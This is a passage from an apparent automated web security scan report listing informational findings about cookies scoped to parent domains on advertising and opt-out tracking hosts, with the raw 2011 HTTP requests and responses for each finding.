Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC02[CE]; Expires=Fri, 2 Sep 2016 04:18:10 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:10 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www312
Content-Length: 0
Content-Type: text/plain
Connection: close


15.117. http://privacy.revsci.net/optout/optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optout.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/optout.aspx?a=1&p=http://www.networkadvertising.org&nocache=2.459788E-02 HTTP/1.1
Host: privacy.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=; rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4ddJjwAHYhBTtuzLxVqYeIB0dM92NsMncA2vI0bDxRRGXldzihH0IzTP2420rfnAJFmebfJ6fSvpAKtGju2Y3H4gP/EkEw6MsyuSHW/2xtsaZWEFZK/sd90fA29DzLYQ+mnsQwg9YdRKYn1CT2JvnAlnRAy+d8yVT/61iEsA/KMmYUKQl/ikKOeS/20ZueyAwRhbpaBfCideOdViY=; rtc_pDT9=MLsvs6VKcT5nJpHGUMPJYuYyUHdqT6LR5ubEw8DRmRbUsThoweg2YcRkyKTtsHnzuxhOY0svIo4EwvbsI9iWksJEsNye+cO+VgHGU5I2hW/5sJYPREd5O/RVikVLzd1fVDIUkMdnDge2al5lAtMrqZqvX1PQhVdQeeA07d84VZJvRpHiKXxQxpj96Sp819Pc5gIE8o5fzY8E9FhLN79SCKxX5zSKwb+hNOx8oJigjIieMQ+pIUGFPbqI3kFJCs7ckNmHCfg2/pF06ypumLzJhmG843Oo0p9CAO+W8uOWJF7zzF8aGie5IiALrJTDd3bZMCj8AQCRYoYeunfKrl/Kyr2+PSP7As+nEey/smtwluNh3SiAAgvwh3ilNo2CQ7jP8ky61SxOEdIdZFwgrh65bvjxpUjFVvSDu8nmiGjaSNanK8XrObNSbZOAwMcKBq7X4NPBqQ==; rsiPus_ymv_="MLtXrl8utl9roAD3CtgJ/MCFqswSrgQEEn5bOqftJtmLJM2JICAiAWoJ5Yu9t3o3dNI8YWdfjMovFAR/OZkpwpGNH1PYq9aujcCUJDf2RXbI06MnSt3p6UHAdBI9wM957Uo//6a6z6+lB+zj1YJH7Dqtxt8mIa9AcCG1YeF3e3fPbB2Xmo9mF1xKIsh1dXJeLZtjCZGHKJmUQzbomPNQZCnZcSEKFuBq/GePBRhQDIBYNt08QI07hfnOhRpDPs/xOSe38X5StA4wff7R4FFAg4ZLi316j3yILYrcop4d+isR0dMNEPscF1jOO5uMkT7Zi2EAiSMj"; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4e070H87Tzw09roY7rZdAWjngdRmX/KB7PAAOyjiwYeh7miSD9WVLs6TEH5yFeQMoXR7TX5IGiGS1ndQrB+MUwUCLY9LCtG1RUIO8T4vZ7TVwpd5UYsttQEEGDrZMobaomRjlr/jOhiOCcTQ9xQb9+ZxLwz0+XUu5YIKhOmjxiMJpwZRR2dIELXMjyf29sb7qjSf1Cix1HEHGuFpdUeIBuWDX/LHHt2MiG9lc0z1DeVzP0JmoTLjwwgU8QnYjXZP5h7MLvOvy5Hymf/1o0ysHCfLP/hOTb27GJKboToNs+qLeJdi/prBMgyzz98mazXxKguLHx0T6OeIB0PFPL6wACVYR6Ss2TVPNWnEuLhdKUBnQHQD8t0djP5BPGHOXR8OLftKDBRxmzGctcKoQOzTlSEDxC80OuWqDdPJHqjRSjgTGt+4RCu7tIz3Lg+9m0WFADgAMwUuCcKxsNJVcSXrmpttM1kVFohWmbAhJyoJMnsd3Bi86iEN0j8kjNF2ZYuvko2nx2Z4sOKKMCmfUT7V/7NRkPPlGNNxlyTn0WoXHoJSGYBllHj6qOSoPVRfiR+b8bcEwaolUKPwotA1Dwps6Z+UFnBwp59XoXSsqM7I/VqpXmvrUdXX/QRWAvo8riXgIu14uzn2Dsizmta9r0eTSn90Szvh5JZONR+QJDh6/TgEWiKAe9//gYZ3Y/wDkkP7wA5d+GLp0fc7Dkt3R16oEsZlK68W7P3GU2X1eitDFg/FxxQBgbyA8Hxqyan5DuymrD8OpRMtI5zglPp8dxSbbwq3txcUmfTAAs5v255PBJekiQOY/qhYL40pS+qFZSnBeiC4mbirYXmLou2NCIgl80u+Xyf5s="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Set-Cookie: NETID01=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_J06575=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_I07714=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETID01=optout; Domain=.revsci.net; Expires=Thu, 27-Aug-2043 11:14:04 GMT; Path=/
Location: http://privacy.revsci.net/optout/optoutv.aspx?cs=True&v=1&p=http%3A%2F%2Fwww.networkadvertising.org%2F
Content-Length: 0
Date: Sun, 04 Sep 2011 11:14:03 GMT


15.118. http://profile.live.com/badge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /badge HTTP/1.1
Host: profile.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 7a3bb2c5-d380-48e6-94fb-3d74eac8b45c
Set-Cookie: E=P:j1j9ytA4zog=:UBh/CRO4RZvxuHgK6BEl/MnlWy6fCJheTBYGAWiy9/k=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:j1j9ytA4zog=:UBh/CRO4RZvxuHgK6BEl/MnlWy6fCJheTBYGAWiy9/k=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 04-Sep-2011 02:38:11 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sun, 11-Sep-2011 04:18:11 GMT; path=/
Set-Cookie: sc_clustbl_142=fbdbae74dce5e0af; domain=profile.live.com; expires=Tue, 04-Oct-2011 04:18:11 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BAYXXXXXC552 V: 1 D: 8/14/2011
Date: Sun, 04 Sep 2011 04:18:11 GMT
Connection: close
Content-Length: 3109


<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=http&#58;//profile.live.com/" /></noscript>
<script type="text/javascript">//<![CDATA[
var _d=document,_dh=_d
...[SNIP]...

15.119. http://px.owneriq.net/naioptout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /naioptout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /naioptout?nocache=0.8888346 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://px.owneriq.net/naioptoutcheck
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 11:15:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:15:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ss=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: sg=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: si=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: sgeo=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: oxuuid=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: gguuid=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: abuuid=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: optout=optout; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.owneriq.net


15.120. http://r.casalemedia.com/rum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=3&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMIMP=102679&1315097282; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMRUM2=04000000002925993182975414771; CMST=TmLhpk5i4aYB; CMSC=TmLhpg**; CMDD=AAHRwAE*; CMD2=AAFbVk5i4aYAAdHAAAOPLAEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 02:40:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:40:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=f7My40gDlEgAAAwSA7UAAAAH;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:40:06 GMT
Set-Cookie: CMTS='';domain=casalemedia.com;path=/;expires=Sat, 03 Sep 2011 02:40:06 GMT;Discard
Set-Cookie: CMTP='';domain=casalemedia.com;path=/;expires=Sat, 03 Sep 2011 02:40:06 GMT;Discard
Set-Cookie: CMPS=188;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:40:06 GMT
Set-Cookie: CMPP=011;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:40:06 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771%5D%5D%3E%3E&febb72d3938b2974c9559972&03000000004e62cac5-3093-5789-301b-6f4e7fbf3921&8742c8826e740e8c)!(sn%3D*)!(sn%3D*&14000000006731d4ad-7dae-4402-b507-a0bc233d79fb;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:40:06 GMT
Set-Cookie: CMST=TmLk605i5QYX;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:40:06 GMT

GIF89a.............!.......,...........D..;

15.121. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; s=2307fe4f-797f-4f4b-9132-9e335f582595; p=1315103289

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:52 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Tue, 03-Sep-2013 03:29:52 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

15.122. http://r.pixel.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.pixel.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1330&id=6&format=image&r= HTTP/1.1
Host: r.pixel.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: rth=2-lpay4l-44~1nwul~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_efdn=44%3A1nwul%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l7bw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: T_czb=ltp%3A1oe9c%3A1; Domain=trafficmp.com; Expires=Mon, 03-Sep-2012 03:58:45 GMT; Path=/
Set-Cookie: rth=2-lpay4l-ltp~1oe9c~1~1-44~1nwul~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Mon, 03-Sep-2012 03:58:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 03:58:44 GMT

GIF89a.............!.......,...........D..;

15.123. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 03:29:44 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 03:29:44 GMT

GIF89a.............!.......,...........D..;

15.124. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 02:28:19 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 02:28:18 GMT

GIF89a.............!.......,...........D..;

15.125. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 04:18:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 04 Sep 2011 04:18:17 GMT
Connection: close
Set-Cookie: C2=KwvYO9aFHYIiGt7sQdwSka0uSKMCdbdxlJoII0bSFAH; domain=advertising.com; expires=Tue, 03-Sep-2013 04:18:17 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

15.126. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 04:18:15 GMT
